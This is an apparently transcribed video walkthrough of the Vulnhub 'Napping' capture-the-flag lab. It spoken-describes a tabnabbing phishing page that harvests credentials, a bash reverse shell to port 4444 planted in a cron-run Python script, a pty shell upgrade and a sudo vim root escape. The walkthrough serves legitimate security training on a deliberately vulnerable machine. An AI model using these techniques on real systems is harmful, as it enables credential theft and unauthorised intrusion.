Alright guys, welcome back to another video. Today we are going to do a walkthrough of the Vulnhub CTF of napping, and we're just going to get right into it. There's not much to start, to say to start. So IPA to start, obviously, and then we're going to do net discover on our network. We see our IP address, and now we're going to see our target IP address, which is going to be 102 right there. As we all know, .1 is our router. In this case, it's pfSense. Same process we did before. This is our IP. This is their IP. So let's go ahead, clear that. Let's go do a quick nmap on our target IP. I believe that's it. Okay, SSH and HTTP is open. Let's just go straight up to the web page. We're going to we're not restoring no session. We're gonna go http://192.168.1.102. Gonna be a login page. Again, try to log in. Not gonna work. Okay. Let's just log in then. Well, let's make a just click sign up. And we're gonna just make a I can't type today. Wow. All right, submit that. It's gonna take us back here. Then we're gonna sign in. All right, this is what we're gonna see. Let's go ahead and take a look at the page source for this one. I don't see nothing of any significant value here, so we're gonna close that. We do have a link area. Let's see if it will let me just put in like YouTube. I have YouTube right there. Okay, what does that do? Looks like our source didn't change, but that's not right because something obviously changed on our main page. So that happens. Let's just inspect. I've used inspect before. So we see it in different main areas. They'll be right there. That's what changed. There's our placeholder, our input, submit page. What's this? Thank you for submission. Target equals blank. Okay, that's a vulnerability right there. That's a tab napping vulnerability. So we can use that. We can exploit that and make a phishing attack. So what we're going to do is we're going to go ahead and we're going to go back here. We're going to make a file. Well, I'm not going to make the file. I've already made them right here. There's two files we're going to make it. We're just going to rename them. But let's go here. This is our index page. It is going to be the same thing as we signed out. And look at the source here. It's the same thing here. We're just going to copy this and we're going to paste it in a file. And we're going to save it as index.html. And then we're going to exit. See, we're going to rm index.html.txt. We don't need it. And then for our script, what we're going to do is we're going to look at it. All it is a simple HTML script. Here it is in its entirety. Oh, that's wrong click. Click it. There we go. And what this does is it's going to replace the previous page, the page that they opened, is going to replace it with our link, so that it will look like they clicked the thing and then they got logged out. And what's going to show is another login page, but it'll be our login page. So maybe we can capture some credentials with that. So save as, it could be anything, but I just put script.html, and then we're gonna exit, and then let's clear all that. We don't need that anymore. And then now what we're gonna do is we're gonna do Python 3 -m HTTP server space 80. And what that's going to do is that's going to host an HTTP server on our port 80, which is our HTTP port. And we do that so that we can actually post our thing. So here we're going to log back in. And then in here we're going to put http:// our IP address :80 / script.html. Then we're going to click submit. All right. And when we do that, we're also going to make a new port. We're going to do netcat listening on port 8000. And we'll see if we get any, we should be able to capture some sort of credentials from this attack. Sometimes it takes a while. While we wait, we're going to press that. We're going to just sign out here. And put that down. There we go. All right. So we got a username and a password right here. But this password, it is HTML encoded. So what you can do is you could just copy it from here. And if you are not behind a firewall like I am, what you would do is you would just copy that. You would go to your web browser, make a new tab, and then search up CyberChef. And what CyberChef is going to do is it'll allow you to decode pretty much anything with encryption, encoding, all that. And it's going to look like this right here. And what you'll do is you can put them over here and then input something here, and it will translate it. And so you'll just put that password in here and make sure you put in URL to decode. You'll put that password here. That's not it, but you'll put the password there and it will tell you what the password is. But the password is going to be caught me napping. So we can just do SSH into the machine, Daniel at 192.168. Enter. Password is not me napping. 2, 3. All right, now we're in. Hit the ls. Okay, we can't do that. Sudo -l. Gotta type the password in again. Can't run sudo. Okay. Let's do cd/home ls. Okay, we got another user. Can we go into that user? Yes, we can. Okay, there's a user flag. Can we see that flag? No, we cannot. Okay, that is fine. Next, let's just look at and see. Let's see what these other things do. So let's clear. Let's do cat query. Okay, it looks like a little script that looks at this. It looks at the request, and if there's a request, it says status up. Okay, and then so to site status. Okay, so site status must just be. Let's see. Okay, it looks like it runs every 2 minutes. Yeah, every 2 minutes. Okay, so let's take advantage of that and actually hold on. Let's see what permissions we have. We do have write permissions to this script because we are, let's see, we are an administrator. Groups. Yep, we are an administrator. So we have write permissions to this script. Okay, so let's take advantage of that. Let's clear this one more time. We're going to make a reverse shell. Let's do nano slash dev slash shm. That will store a shm is a directory that's stored in the memory, so it will be cleared after reboot, reducing our reducing chances that will be detected. And we'll do reverse shell sh, and in here we're gonna type pound exclamation point /bin/bash, enter. Then we're gonna do bash -i space this arrow, this and symbol right there, /dev /tcp/our IP address 1.100 colon. We're going to send it, not colon, slash. We're going to send it to port 4444, and then the 0 exclamation and 1. Right, that's it. Then we're going to save it, exit, and then let's edit the query page. We're going to just clear it out with echo. All right, that should have cleared it out. Yep. And now we're going to do this nano query. And what we're going to do is we're going to type in import os.system open parentheses /user/bin/bash space /dev /shm/reverse shell.sh, which is our shell. We're going to close that up, and that's going to make it where this file forces the OS. Every time it runs, the OS is going to run bash and run this shell, pretty much. Enter, exit. Now let us go back to a new terminal. We're going to go here, Open new place. We're gonna do netcat again, but instead of 8,000, we're gonna do 4444. And then we're gonna wait for a second. Looks like we just missed it. So we're gonna have to wait 1 minute. And it should pop something, a shell should pop up right here. And while we wait, we can close some of these others. We keep that, we're gonna keep that. We can close the web. All right. And we should have 3 on our Python. We're going to keep that running. We have Daniel and our netcat that should pull up a new shell for the new user. The user, Adrian. All right, there we go. We got a shell. And from there, we can, let's upgrade the shell. We're gonna do Python 3-C import bty colon space, well, semicolon, pty dot spawn parentheses quotation slash bin slash bash quotation parentheses. All right, we're gonna enter that. Then from here, we're going to do. Did we mess it up? Oh yeah, we messed it up. Hold on. Okay. We're gonna have to listen back on this file. We missed a quote, a single quote at the end. Let's just make sure you put a single quote at the end, and then it will work. So let's just get a new shell real quick, and we're just gonna repeat the process. All right. Python 3-C py import pty dot spawn slash bin slash bash. All right, and then we're going to do Control Z to put it to background the shell. Then we're going to do stty raw dash echo semicolon space fg, and then we're going to do, make sure you enter twice and you'll see it, shell pop up again. Then you're going to do export space term equals x term. All right, and that way that upgrades our shell, so now we can use arrow keys and get those and make sure it acts more natural compared to what it was before. So now let's clear. And from here, we're going to do pwd. All right, let's do ls. We can get that user text now. All right, and let's see, sudo -l Okay, we can run a text editor vim as root with no password. We could just use that for a simple shell escape by doing sudo vim dash c what's it called, a quote, single quote colon exclamation point slash bin slash bash well, slash bin slash h for shell. You can do that. That will work. Or what you can do is you can go do just sudo vim, and then from here do parentheses exclamation point slash bin slash bash. That will work as well. As you see, we now have root. We can tell by who am I, root, see, and then let's just go cd tilde for home, or you can also do cd slash root, and it'll be just same thing, ls root.txt, cat root, boom. And that is how you complete napping. Thank you for watching. If you have any other questions, anything I can help with, go ahead and just let me know in the comments section, and I will talk to y'all later. Stay safe and stay secure.